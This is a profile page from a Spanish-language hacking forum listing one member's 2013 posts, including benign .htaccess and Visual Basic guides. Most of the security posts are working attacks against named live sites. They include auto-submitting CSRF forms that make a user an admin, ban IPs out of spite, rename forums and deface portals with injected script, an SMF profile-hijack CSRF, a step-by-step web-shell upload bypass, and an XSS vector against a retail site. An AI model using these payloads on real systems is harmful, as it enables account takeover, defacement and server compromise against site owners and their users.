Mostrar Mensajes

Esta sección te permite ver todos los posts escritos por este usuario. Ten en cuenta que sólo puedes ver los posts escritos en zonas a las que tienes acceso en este momento.

Temas - Réplica1

Páginas: [1]
1
Off Topic / [PEDIDO] Introducción para videos
« en: Noviembre 03, 2013, 10:18:12 am »
Buenas a todos, esta vez vengo a pedir si algún diseñador (o cualquier persona que sepa hacerlo) me podría hacer una intro para youtube, ya que quiero subir vídeos y tal. si alguien lo hiciera le doy mil gracias.

Una idea de como lo quiero seria: al principio saliera mi nombre (Réplica) y abajo apareciera de uno en uno ''Gameplays'' y ''Vlogs'' sin las comillas, con alguna música de fondo que quede bien.

Antes de nada dar las gracias y decir que si alguien me la hace, pondría la url del foro y el del perfil que me la realizo en la descripción y si tuviera un canal de youtube también lo pondría.

Un saludo.

2
C# - VB.NET / Simple RAT [Source code ] [vb.net]
« en: Octubre 23, 2013, 01:56:25 pm »

3
Bugs y Exploits / CSRF Twitter
« en: Octubre 05, 2013, 03:14:59 pm »
Buenas indagando por todas las redes sociales grandes buscando diversas vulnerabilidades, me encontre con este CSRF en el registro, no es mucha cosa ya que solo registra una cuenta nueva la persona que entra pero quiero compartirla.

Url: https://twitter.com/signup

CSRF: http://pastebin.com/Spa5CEsQ

Fue reportado por un mensaje a la cuenta oficial de twitter ayer por la noche, desconozco si ya fue arreglada.



El texto fue redactado en el traductor ya que no se ingles, supongo que habra algunas burradas  ;D

Salu2;)

5
Dudas y pedidos generales / [SOLUCIONADO] Dominios gratis
« en: Septiembre 15, 2013, 10:19:19 am »
Buenas, quiero montar mi propia web pero no tengo dominio.

Mi pregunta es: ¿ahí alguna web que te de dominio gratis? one te daba 1 año gratis pero ya quitaron la promoción, si alguien sabe alguna web que te de dominio .es .net. org .es .com etc, gratis decírmelo por favor.

Saludos.

6
Hacking ShowOff / XSS ~ www.tienda.sevillafc.es
« en: Septiembre 12, 2013, 08:01:41 am »
Al elegir un artículo, nos salía esta preciosa URL: http://tienda.sevillafc.es/?op=grupo&id=50
Primero probé si tenía SQL, (no tiene) y entonces me dió por probar una alerta textarea, borré el iD y me salió esto:



Voy a reportar el fallo a los websmasters del sitio para que no sufran ningún contratiempo, y para qué ningún usuario o usuario externo del foro provoque daños al sitio web.

7
Zona Webmaster / Como usar el .htaccess
« en: Agosto 28, 2013, 10:46:54 am »
¿Qué es un .htaccess?

El .htaccess (Acceso de Hiper-Texto) es el nombre por defecto del archivo de configuración de directorios de Apache. Se utiliza para personalizar la configuración de directivas y parámetros definidos en el archivo de configuración principal del alojamiento. Tiene una gran variedad de usos y utilidades que le pueden resultar útiles en su web. En el siguiente tutorial le mostramos algunas de las funciones más utilizadas por el .htaccess.


¿Cómo crear y dónde colocar un fichero .htaccess?

Para crear un fichero .htaccess, abra el bloc de notas e introduzca el código necesario. Guarde el fichero como fichero de texto (.txt), por ejemplo "fichero_htaccess.txt", y súbalo por FTP en la carpeta donde tiene que utilizarse. Una vez en el servidor, modifique el nombre del fichero "fichero_htaccess.txt" por el de ".htaccess".

El .htaccess debe colocarse en el interior de la carpeta donde queremos que tenga efecto. Por ejemplo, si queremos proteger con contraseña una carpeta llamada "privado", colocaremos el .htaccess dentro de la carpeta "privado".


Utilidades comunes  del .htaccess

El .htaccess tiene un gran número de utilidades, en este tutorial le mostramos algunas de las utilidades más comunes y cómo debe configurarse en el fichero .htaccess

Control de acceso al sitio

Podemos hacer que, si por alguna razón deseamos denegar el acceso a todos los usuarios o sólo permitir a un cierto grupo de direcciones IP para que tengan acceso a tu sitio.

Para permitir el acceso a tu sitio solo a ciertas IPs:

Código: [Seleccionar]
ErrorDocument 403 [url]http://www.mi-url.com[/url]
Order deny,allow
Deny from all
Allow from 124.34.48.165
Allow from 102.54.68.123

Las IPs 124.34.48.165 y 102.54.68.123 son las IPs que tendrán acceso a la web.

Denegar el acceso al sitio solo a ciertas IPs:

Código: [Seleccionar]
Allow from all
Deny from 145.186.14.122
Deny from 124.15

La IP 145.186.14.122 y la red 124.15.x.x no tendrán acceso a la web.

Control de acceso a carpetas

Un uso muy común del .htaccess es impedir el acceso a algunas carpetas. Puede ser que queramos deshabilitar totalmente el acceso a una carpeta (por ejemplo, una carpeta con librerías de programación que se incluyen en los archivos principales. En este caso sólo los archivos principales accederán a ellos mediante el sistema de archivos, pero no se podrán acceder via web). Bueno, simplemente creamos un archivo .htaccess en esa carpeta que contenga el siguiente codigo si deseamos:

Prohibir o deshabilitar por completo el acceso a una carpeta:

Código: [Seleccionar]
#deny all access
deny from all

Permitir el acceso desde una IP específica:

Código: [Seleccionar]
#deny all access
deny from all
allow from 212.267.98.14

Permitir el acceso a un rango específico de IPs (forzado mediante la máscara de red):

Código: [Seleccionar]
allow from 192.168.0.0/24
Bloquear el acceso a un archivo específico:

Código: [Seleccionar]
<Files archivo.html>
Order allow,deny
Deny from all

Listado de carpetas

También podemos utilizar el .htaccess para mostrar el contenido de una carpeta en la estructura de directorios.

Código: [Seleccionar]
Options +Indexes
Listado de carpetas, pero no queremos que se nos muestren los iconos por defecto:

Código: [Seleccionar]
Options +Indexes
IndexOptions -FancyIndexing

También se podría querer evitar el listado de carpetas:

Código: [Seleccionar]
IndexIgnore *
Redirigir web

Si al acceder a su alojamiento, desea redirigir la página a otra:

Código: [Seleccionar]
RewriteEngine On
RewriteRule ^(.*)$ [url]http://www.webaredirigir.com/[/url]$1 [R=301,L]

Redirigir peticiones a subcarpeta

Si tenemos la web en una subcarpeta diferente de la carpeta "web", podemos redirigir todas las consultas a esta subcarpeta:

Código: [Seleccionar]
RewriteEngine on
RewriteCond % ^midominio.com\.com$
RewriteRule (.*) [url]http://www.midominio.com/[/url]$1 [R=301,L]
RewriteRule ^$ carpeta [L]

donde:
midominio.com\.com sería, por ejemplo, cdmon\.com.com
carpeta sería, por ejemplo, wordpress

Redirigir peticiones con www.dominio.com a dominio.com y a la inversa

Si queremos que nuestra web se vea siempre sin www, añadimos el siguiente código en el .htaccess:

Código: [Seleccionar]
<IfModule mod_rewrite.c>
RewriteEngine On
RewriteBase /
RewriteRule ^index\.php$ - [L]
RewriteCond % !-f
RewriteCond % !-d
RewriteRule . /index.php [L]
RewriteCond % ^www\.midominio.com [NC]
RewriteRule ^(.*)$ [url]http://midominio.com/[/url]$1 [L,R=301]
</IfModule>

I al revés, que la web se vea siempre con www:

Código: [Seleccionar]
<IfModule mod_rewrite.c>
RewriteEngine On
RewriteBase /
RewriteRule ^index\.php$ - [L]
RewriteCond % !-f
RewriteCond % !-d
RewriteRule . /index.php [L]
RewriteCond % ^\.midominio.com [NC]
RewriteRule ^(.*)$ [url]http://www.midominio.com/[/url]$1 [L,R=301]
</IfModule>

donde:
midominoi.com podría ser, por ejemplo, cdmon.com

Redirigir web amigable con SEO

Si has transferido nombres de dominio o deseas redireccionar a una página específica sin que afecte a los resultados de los motores de búsqueda como Google, utiliza el siguiente código:

Código: [Seleccionar]
Redirect 301 /d/nombredelarchivo.html [url]http://www.mi-url.com[/url]
Redireccionar el tráfico web

Si lo que deseamos es que si alguien intenta acceder a un archivo en concreto le redirija a otro fichero, podemos utilizar la directiva Redirect:

Código: [Seleccionar]
Redirect /fichero.php [url]http://sudominio.com/otros/nuevofichero.php[/url]
Redireccionar a conexión segura HTTPS

Si deseamos redireccionar todo nuestro sitio a una conexión segura (HTTPS), esto es muy util si por ejemplo disponemos de un certificado SSL y queremos trabajar con el.

Código: [Seleccionar]
RewriteEngine On
RewriteCond %{SERVER_PORT} 80
RewriteRule ^(.*)$ [url]https://www.midominio.com/[/url]$1 [R,L]

Redireccionar usuarios para usar HTTPS para una carpeta en particular

Si lo que deseamos es solo redireccionar a una conexión segura (HTTPS) una carpeta en particular en vez de todo el sitio, por ejemplo tenemos una tienda en una carpeta aparte de nuestro sitio, hay que usar el siguiente codigo.

Código: [Seleccionar]
RewriteEngine On
RewriteCond %{SERVER_PORT} 80
RewriteCond %{REQUEST_URI} nombre_de_la_carpeta
RewriteRule ^(.*)$ [url]https://www.midominio.com/nombre_de_la_carpeta/[/url]$1 [R,L]

Evitar el hotlinking

El hotlinking consiste en realizar un enlace directo a ficheros, generalmente imágenes y vídeos, que pertenecen a otra web. Esta práctica consume la transferencia del sitio original de la imagen. Para evitar que nos "roben" ancho de banda podemos configurar el .htaccess para impedir el hotlinking. RewriteEngine on

Código: [Seleccionar]
# Options +FollowSymlinks
RewriteCond %{HTTP_REFERER} !^$
RewriteCond %{HTTP_REFERER} !^http://(www\.)?midominio.com/.*$ [NC]

Ahora falta la ultima linea que puede ser para prohibir que contenido no deseamos (se escoje en función de las extensiones de los archivos) que nos cojan:

Código: [Seleccionar]
RewriteRule .*\.(jpe?g|gif|bmp|png)$ [L]
O bien esta otra regla que además muestra un archivo (no_robar_ancho_de_banda.gif que debemos haber creado previamente) para advertir que esta imagen esta siendo cogida de nuestro site.

Código: [Seleccionar]
RewriteRule .*.(gif|jpg|png)$ [url]http://midominio.com/img/no_robar_ancho_de_banda.gif[/url][nc]
En la última línea ponemos las extensiones de los ficheros que queremos impedir que los enlacen.

Cambiar la pagina por defecto

Puedes hacer que la página indice de tu sitio a mostrar no sea la archiconocida "index". Aquí seteamos "about.html" como página de inicio:

Código: [Seleccionar]
#Serve Alternate Default Index Page
DirectoryIndex about.html

Quitar palabras o strings de una URL

Esta opción sirve para evitar que la gente conozca nuestro arbol de rutas de nuestro alojamiento con ello incrementamos la seguridad a la vez que hacemos la dirección más atractiva. En este ejemplo, quitaremos la palabra "category" de nuestras URL.

Es decir: http://tudominio.com/category/blue -> http://tudominio.com/blue

Agrega este código al final de tu .htaccess

Código: [Seleccionar]
RewriteRule ^category/(.+)$ [url]http://www.midominio.com/[/url]$1 [R=301,L]
Forzar el cacheo de nuestro sitio

El siguiente snippet no va a incrementar directamente la velocidad de carga del sitio en general, pero sí va a cargar más rápido cuando el mismo usuario vuelva a visitarlo, al enviar un status 304 cuando se pidan elementos que no han sido modificados. Puedes cambiar la frecuencia de cacheo al cambiar el número de segundos (en este ejemplo se da una vez al día):

Código: [Seleccionar]
FileETag MTime Size
ExpiresActive on
ExpiresDefault "access plus 86400 seconds"

Mejorar la compatibilidad de los caracteres

Esta opción es para aquellos que no utilizan un juego de caracteres standard reconocido por el servidor, con esta medida evitamos mostrar el famoso error 500.

Código: [Seleccionar]
AddDefaultCharset utf-8
Crear URL amigables

Una URL amigable consiste en disfrazar una URL llena de parámetros para que quede más elegante y para ayudar también a tener una mejor posición de la página en los buscadores.

Por ejemplo, carpeta/fichero.php?id=120&idioma=es es una URL no amigable, por lo que la transformaremos en carpeta/fichero/120/es que es más elegante y ayuda al posicionamiento en los buscadores. Es una URL amigable. Con el fichero .htaccess podemos realizar este disfraz para la URL.

Tenemos una carpeta en nuestra web que tiene un fichero al que se le pasan parámetros.

sudominio.com/carpeta/fichero.php?id=25

Entonces, dentro de esta carpeta crearemos un .htaccess con el siguiente código:

Código: [Seleccionar]
Options +FollowSymLinks
RewriteEngine on
RewriteRule carpeta/(.*)/(.*).php$ /carpeta/fichero.php?id=$1

En la última línea es donde se realiza el cambio.

(.*) será el parámetro que le pasaremos, $1.

(.*).php$ será el nombre del fichero para "decorar" la URL.

Una vez creado el .htaccess, en el enlace de nuestra web pondremos:

Código: [Seleccionar]
<a href="carpeta/25/nombre-del-fichero.php"> Enlace al fichero 25</a>
Por lo tanto, carpeta/25/nombre-del-fichero.php será lo mismo que /carpeta/fichero.php?id=25.

Fuente: https://info.cdmon.com/index.php?page=como-utilizar-htaccess&hl=esp

Saludos.

8
Bugs y Exploits / CSRF'S miarroba forums [By Pekador]
« en: Agosto 27, 2013, 09:39:34 am »
Para cambiar la firma de cualquier foro [email protected]

Código: PHP
  1. <script>
  2. function envio_csrf()
  3. {
  4. document.csrf1.submit()
  5. }
  6. </script>
  7. <form action="[url]http://netpoison.mforos.com/options/[/url]" method=post name="csrf1">
  8. <input type="hidden" name="firma" value="Underc0de.org">
  9. <input type="hidden" name="boton_continuar" value="Continuar">
  10. <body onload="envio_csrf()">

-----------------------------------------------------------------------------------------------------

Este csrf se tarda mas en ejecutarlo ya que por cada palabra lo tienes que subir a un hosting distinto pero sigue valiendo, lo que ara es una vez que alla filtrado esa palabra se redirigira a el otro csrf y se filtraba y así sucesivamente es algo 'molesto' pero sigue valiendo!

lo que hace es filtrar palabras como 'hola' por la palabra que queramos.

Código: PHP
  1. <script>
  2. function envio_csrf()
  3. {
  4. document.csrf1.submit()
  5. }
  6. </script>
  7. <form action="[url]http://foros.miarroba.es/filtro_palabras.php?id=2099129[/url]" method=post name="csrf1">
  8. <input type="hidden" name="original" value="hola">
  9. <input type="hidden" name="filtrada" value="Underc0de.org">
  10. <input type="hidden" name="boton_continuar" value="Continuar">
  11. <body onload="envio_csrf()">
  12.  
  13. <?php
  14. header('Location: otrocsrf.com');
  15. ?>

---------------------------------------------------------------------------------------------------------------------------

Con este csrf desactivas el avatar o la firma a cualquier usuario permanentemente asta que la vuelvan activar

Firma:


Código: PHP
  1. <script>
  2. function envio_csrf()
  3. {
  4. document.csrf1.submit()
  5. }
  6. </script>
  7. <form action="[url]http://netpoison.mforos.com/users/crackme/[/url]" method=post name="csrf1">
  8. <input type="hidden" name="tabla_boton" value="Desactivar firma">
  9. <body onload="envio_csrf()">


Avatares: 


Código: PHP
  1. <script>
  2. function envio_csrf()
  3. {
  4. document.csrf1.submit()
  5. }
  6. </script>
  7. <form action="[url]http://netpoison.mforos.com/users/crackme/[/url]" method=post name="csrf1">
  8. <input type="hidden" name="boton" value="Desactivar avatares">
  9. <body onload="envio_csrf()">

------------------------------------------------------------------------------------------------------------------------------

Con este csrf puedes elevarte los privilegios a administrador


Código: PHP
  1. <script>
  2. function envio_csrf()
  3. {
  4. document.csrf1.submit()
  5. }
  6. </script>
  7. <form action="[url]http://teamhackworld.mforos.com/users/crackme/[/url]" method=post name="csrf1">
  8. <input type="hidden" name="nuevo_nivel" value="999">
  9. <input type="hidden" name="accion" value="Cambiar nivel">
  10. <body onload="envio_csrf()">

-------------------------------------------------------------------------------------------------------------------------------

Esta sirve para crear un subforo nuevo

Código: PHP
  1. <script>
  2. function envio_csrf()
  3. {
  4. document.csrf1.submit()
  5. }
  6. </script>
  7. <form action="[url]http://foros.miarroba.es/nuevo_subforo.php?id=2099129[/url]" method=post name="csrf1">
  8. <input type="hidden" name="forotitulo" value="Underc0de.org">
  9. <input type="hidden" name="forodesc" value="El mejor foro">
  10. <input type="hidden" name="txp" value="100">
  11. <input type="hidden" name="mxp" value="100">
  12. <input type="hidden" name="activacode" value="no">
  13. <input type="hidden" name="boton_continuar" value="Continuar">
  14. <body onload="envio_csrf()">

---------------------------------------------------------------------------------------------------------------------------

Este csrf cambia los datos generales de tu usuario de [email protected], tu nombre real, tu website, intereses, aficiones, firma etc

Código: PHP
  1. <script>
  2. function envio_csrf()
  3. {
  4. document.csrf1.submit()
  5. }
  6. </script>
  7. <form action="[url]http://privados.miarroba.es/#!new[/url]" method=post name="csrf1">
  8. <input type="hidden" name="homepage" value="[url=http://www.Underc0de.org]www.Underc0de.org[/url]">
  9. <input type="hidden" name="nombre" value="Pekador">
  10. <input type="hidden" name="apellidos" value="Revise su seguridad">
  11. <input type="hidden" name="firma" value="Visita Underc0de">
  12. <input type="hidden" name="descripcion" value="CSRF">
  13. <input type="hidden" name="aficiones" value="Underc0de.org">
  14. <input type="hidden" name="boton_continuar" value="Continuar">
  15. <body onload="envio_csrf()">

--------------------------------------------------------------------------------------------------------------------------

Estos de [email protected] tienen mas csrf en sus foros ..., aquí os dejo otro esta vez para banear por ip ¿te cae mal alguien y te sabes su ip? banealo de cualquier foro [email protected] ;D

para sacar la id del foro, poner /admin despues de la url: foro.mforos.com/admin

Código: PHP
  1. <script>
  2. function envio_csrf()
  3. {
  4. document.csrf1.submit()
  5. }
  6. </script>
  7. <form action="[url]http://foros.miarroba.es/baneo_ip.php?id=2099129&do=new[/url]" method=post name="csrf1">
  8. <input type="hidden" name="text" value="Aquí la ip que quieran banear">
  9. <input type="hidden" name="motivo" value="//**Underc0de.org**//">
  10. <input type="hidden" name="time" value="30">
  11. <input type="hidden" name="boton_continuar" value="Continuar">
  12. <body onload="envio_csrf()">

-------------------------------------------------------------------------------------------------------------------------------

Buenas aquí os dejo este csrf para [email protected] que sirve para cambiar la url del foro, entre otras cosas menos importantes :D

necesitaremos la id del foro, se consige poniendo /admin despues de la url del foro

Código: PHP
  1. <script>
  2. function envio_csrf()
  3. {
  4. document.csrf1.submit()
  5. }
  6. </script>
  7. <form action="[url]http://foros.miarroba.es/general.php?id=2099129[/url]" method=post name="csrf1">
  8. <input type="hidden" name="titulo" value="Underc0de"> //
  9. <input type="hidden" name="nombre" value=".org">
  10. <input type="hidden" name="descripcion" value="Underc0de.org">
  11. <input type="hidden" name="categoria" value="10">
  12. <input type="hidden" name="tagsService[]" value="pwned">
  13. <input type="hidden" name="boton_continuar" value="Continuar">
  14. <body onload="envio_csrf()">
  15.  

-----------------------------------------------------------------------------------------------------------------------------------

Cambia el nombre de la cuenta de [email protected]

Código: PHP
  1. <script>
  2. function envio_csrf()
  3. {
  4. document.csrf1.submit()
  5. }
  6. </script>
  7. <form action="[url]http://miarroba.es/usuarios/modificar.php[/url]" method=post name="csrf1">
  8. <input type="hidden" name="privacidad" value="registrados">
  9. <input type="hidden" name="nick" value="Underc0de">
  10. <input type="hidden" name="pais" value="12">
  11. <input type="hidden" name="provincia" value="192">
  12. <input type="hidden" name="zipcode" value="60155">
  13. <input type="hidden" name="sexo" value="Hombre">
  14. <input type="hidden" name="dia" value="5">
  15. <input type="hidden" name="mes" value="11">
  16. <input type="hidden" name="ano" value="1994">
  17. <input type="hidden" name="boletin" value="si">
  18. <input type="hidden" name="promos" value="si">
  19. <input type="hidden" name="accion" value="update">
  20. <input type="hidden" name="boton_continuar" value="Continuar">
  21. <body onload="envio_csrf()">
  22.  

------------------------------------------------------------------------------------------------------------------------------------

Rara defacear el portal de cualquier foro de [email protected] claro que tenga el portal activado

Código: PHP
  1. <script>
  2. function envio_csrf()
  3. {
  4. document.csrf1.submit()
  5. }
  6. </script>
  7. <form action="[url]http://foros.miarroba.es/portal.php?id=2037885&seccion=crear_contenido&tipo=personalizado[/url]" method=post name="csrf1">
  8. <input type="hidden" name="titulo" value="Pekador">
  9. <input type="hidden" name="codigo" value="<script>document.documentElement.innerHTML='<iframe width=100% height=100% src=URL DEFACE>';</script>">
  10. <input type="hidden" name="columna" value="2">
  11. <input type="hidden" name="nivelmin" value="0">
  12. <input type="hidden" name="nivelmax" value="0">
  13. <input type="hidden" name="tipo" value="personalizado">
  14. <input type="hidden" name="boton_continuar" value="Continuar">
  15. <body onload="envio_csrf()">

---------------------------------------------------------------------------------------------------------------------------------------

Reportado: Sí, pero el dueño no sabe fixearlas yo le ofrecí mi ayuda y la rechazo.

Y hay muchos mas, esto demuestra la seguridad de esos foro saludos y hasta la próxima.

9
Hacking ShowOff / XSS - Nutella
« en: Agosto 26, 2013, 10:04:19 pm »
Encontre este XSS en la web oficial de nutella..

http://i.imgur.com/xNwhmCG.jpg

URL: www.nutella.es
Path: Buscador.
Vector Utilizado: "><script>alert("Pekador Holoscripter")</script>
Autor: Pekador
Reportado: Sí, pero sin respuesta.

10
Bugs y Exploits / [CSRF] [SMF] Cambiar perfil
« en: Agosto 26, 2013, 08:12:44 pm »
Hoy os traigo un csrf en SMF.

Esto es importante, en la ultima linea:

Código: [Seleccionar]
<input type="hidden" name="u" value="94">
En value, donde pone '94' ahí que poner el numero de perfil de la victima es tan fácil como ir a tu perfil y ir cambiando el ultimo numero asta que encuentres su perfil.


Código: PHP
  1. <script>
  2. function envio_csrf()
  3. {
  4. document.csrf1.submit()
  5. }
  6. </script>
  7. <form action="[url]http://foro.com/foro/index.php?action=profile;area=forumprofile[/url]" method=post name="csrf1">
  8. <input type="hidden" name="avatar_choice" value="none">
  9. <input type="hidden" name="personal_text" value="P3K4D0R">
  10. <input type="hidden" name="bday3" value="6666">
  11. <input type="hidden" name="bday1" value="01">
  12. <input type="hidden" name="bday2" value="12">
  13. <input type="hidden" name="location" value="Mongolia">
  14. <input type="hidden" name="msn" value="[email protected]">
  15. <input type="hidden" name="usertitle" value="Pekador">
  16. <input type="hidden" name="signature" value="Underc0de">
  17. <input type="hidden" name="website_title" value="Underc0de">
  18. <input type="hidden" name="website_url" value="Underc0de.org">
  19. <input type="hidden" name="button_submit" value="Cambiar perfil">
  20. <input type="hidden" name="u" value="94">
  21. <body onload="envio_csrf()">

Reportado: Sí, y fixeado en todas las versiones.

11
Bugs y Exploits / Bypass upload mal filtrado
« en: Agosto 10, 2013, 07:40:34 pm »
Todos conocemos la vulnerabilidad “webDAV” que nos daba la posibilidad de defacear una página con la subida de una shell, bueno, ya que para mí esta vulnerabilidad está obsoleta, voy a escribir el modo de subir una shell ha una página bypasseando un upload mal filtrado, bueno empecemos.

Lo primero que tenemos que saber, es qué tipo de archivo permite la subida a dicho upload, yo os pondré un ejemplo de una web catalana qué permite la subida de imágenes (.jpeg, .png, .jpg, etc...) Bueno, vamos a ver lo que necesitamos:

HERRAMIENTAS NECESARIAS:

Live HTTP Headers.  https://addons.mozilla.org/es/firefox/addon/live-http-headers/
Una shell. (Recomiendo la I-47) http://pastebin.com/SxXg9aQn

Bueno, lo primero de todo, vamos ha cambiar la extensión de la shell, (Renombrar Archivo – Cambiamos .php a .jpeg) una vez ya cambiada, nos dirigimos a la página qué tenga un upload mal filtrado, en este caso, he encontrado una y aquí haré las prácticas.

Subimos nuestra shell, abrimos Live HTTP Headers, y guardamos la imágen:



Abrimos el Live Header y buscamos esta línea:
Content-Disposition: form-data; name="photo"; filename="I-47.jpeg"\r\n



La seleccionamos y le damos a “Repetir”.

Una vez dentro, buscamos la misma línea, y borrados .jpeg y escribimos .php, quedaría así:
Content-Disposition: form-data; name="photo"; filename="I-47.php"\r\n



Seleccionamos todo y damos a repetir. Una vez hecho todo esto, vamos al sitio donde hemos subido nuestra shell.
Ahora diréis “¿Y cómo accedemos a la shell? Es sencillo, damos click derecho a la “imágen” y seleccionamos “Copiar la ruta de la imágen”. Abrimos una nueva pestaña y copiamos, entramos a ver la imágen y … ¡SORPRESA! Estamos dentro de la shell.



Ya dentro de ella, podríamos defacear y tal, pero en mi caso no lo haré, no me parece muy ético que digámos.

Me gustaría decir que el tutorial lo realize junto a mi amigo ZervR.

12
Visual Basic / Visual basic ~ Qué es y cómo se usa
« en: Agosto 10, 2013, 06:41:33 pm »
La mayoría ya conoceréis Visual Basic y para que sirve, pero en esta mini 'guía' os explicare y enseñare información básica del programa.

Visual Basic es un lenguaje de programación desarrollado por Alan Cooper para Microsoft. Su primera versión fue presentada en 1991, con la intención de simplificar la programación utilizando un ambiente de desarrollo completamente gráfico que facilitara la programación misma, muchos lo comparan con gambas diciendo que es el Visual Basic de linux, vb es un lenguaje de programación fácil de manejar pero a la vez muí útil

Existen muchas versiones, que han ido sacando una detrás de otra intentando mejorar aun mas pero la mejor versión que han sacado ha sido Visual Basic 6, ya que todos los programadores que usen vb casi todos usaran la 6 ya que es muy básica pero lo tiene todo, esta todo mas claro a la hora de trabajar en ella.

Ahora os explicare como trabajar en este lenguaje, nada de códigos solo lo básico como manejar la interfaz.


Esta es la interfaz principal, desde donde se maneja todo.




Para añadir cualquier código, simplemente hay que darle doble clic al objeto que queramos añadirle el código, i cambiara de pantalla y nos saldrá esta donde añadiremos el código entre las 2 lineas que nos viene seleccionado para escribir.




Ahora, si os fijais al lado a la derecha hay una barra pequeñita con diferentes opciones, hay es de donde se controlo todo el diseño; color del form, tamaño, aparencia, bloquearlo, añadir imagen... etc.





Los componentes son los mas importantes, ya que sin ellos no se podria hacer nada cuando descargas visual basic te vienen unos predifinidos y luego tu puedes añadir los que quieras, para añadirlos al form solo tienes que darle click al que quieras y arrastrarlo dentro.




Y por ultimo, esta la opción de depurar, que significa ejecutar el programa pero dentro del entorno sin generar el .exe, normalmente se usa para ver si funciona correctamente y luego generar el .exe.

Esa opción se encuentra, en la barra de arriba de la interfaz, aquí: y exactamente es este botón: .


Eso es todo, espero que alla servido esta mini guía básica sobre Visual Basic, y asta la próxima.


13
Presentaciones / Me presento
« en: Agosto 10, 2013, 04:20:13 pm »
Buenaa a todos, llevo un tiempo en underc0de pero nunca comente ni me presente así que ya va siendo hora.

Vengo de otros foros, que no me an acabado de gustar por que soy muy activo y ningun foro era tanto así que aquí espero aprender y encajar bien, aportare lo que pueda.

Un saludo y espero llegar lejos en este foro  ;D

Páginas: [1]